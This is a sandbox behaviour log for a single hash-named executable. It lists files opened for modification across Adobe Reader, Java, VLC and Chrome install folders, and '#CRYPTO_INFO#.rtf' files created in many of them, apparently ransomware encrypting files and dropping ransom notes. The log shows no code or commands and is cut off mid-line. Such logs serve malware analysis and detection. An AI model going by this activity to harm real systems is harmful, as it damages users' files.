8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\klist.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\de.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\remove.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-windows.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\sysinfo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jjs.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jvm.lib 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_cancel_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\ffjcext.zip 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\javafx-mx.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\nbexec64.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_radio_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-windows.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pt-br_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fil_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.access 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\nashorn.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_psd.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_cancel_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\blacklist 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\hijrah-config-umalqura.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program 